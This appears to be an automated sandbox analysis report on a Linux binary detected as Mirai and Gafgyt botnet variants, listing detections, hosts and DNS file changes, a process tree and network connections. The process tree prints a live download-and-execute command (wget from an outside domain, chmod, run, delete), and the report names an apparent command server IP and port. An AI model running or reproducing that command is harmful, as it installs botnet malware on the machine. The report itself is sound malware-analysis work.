Analysis Overview
SHA256
2d5207861f9e0ed521792b82920b218535499c8a02932b484f0a9df375992986
Threat Level: Known bad
The file 65e8a78d64704cc9af4d19ef090ed81e was found to be: Known bad.
Malicious Activity Summary
Detect Mirai Payload
Detected Gafgyt Variant
Detected x86corona Mirai Variant
Gafgyt family
Mirai family
Mirai_x86corona family
Modifies hosts file
Writes DNS configuration
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-04-11 08:06
Signatures
Detect Mirai Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Detected Gafgyt Variant
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Detected x86corona Mirai Variant
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Gafgyt family
Mirai family
Mirai_x86corona family
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-11 08:06
Reported
2022-04-11 08:11
Platform
ubuntu1804-amd64-en-20211208
Max time kernel
10682s
Max time network
142s
Command Line
Signatures
Modifies hosts file
| Description | Indicator | Process | Target |
|---|---|---|---|
| /etc/hosts | /etc/hosts | /usr/bin/wget | N/A |
Writes DNS configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| /etc/resolv.conf | /etc/resolv.conf | /usr/bin/wget | N/A |
Processes
./65e8a78d64704cc9af4d19ef090ed81e
[./65e8a78d64704cc9af4d19ef090ed81e]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
./.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| RU | 45.153.231.64:666 | | tcp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |
| RU | 45.153.231.64:666 | | tcp |